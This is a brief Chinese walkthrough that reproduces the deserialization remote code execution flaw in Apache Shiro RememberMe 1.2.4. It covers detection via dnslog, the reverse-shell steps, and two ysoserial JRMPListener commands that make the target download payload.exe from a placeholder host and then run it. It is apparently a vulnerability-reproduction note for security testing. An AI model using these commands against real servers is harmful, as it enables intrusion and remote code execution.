Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现
影响版本
Apache Shiro <= 1.2.4
默认shiro的commons-collections版本为3.2.1,
环境搭建
漏洞测试
- 抓包测试
查看返回包里setcookie有rememberme的字样
继续测试
首先最简单的测试方法是用dnslog,看看是否有回显。
利用**生成rememberMe
dns发现有回显,说明存在反序列化漏洞。
漏洞复现
1.监听回弹shell
2.生成key
3.使用ysoserial中JRMP监听模块,监听9920端口
4.重放
5.收到返回shell
linux的复现相对简单,window由于没有命令直接返回shell,可以结合第三方工具返回shell。
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget x.x.x.x/payload.exe -O payload.exe'
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 './payload.exe'
ps:
1.windows 可以用这个,别忘了更改路径
2.网上git有漏洞扫描器:
回显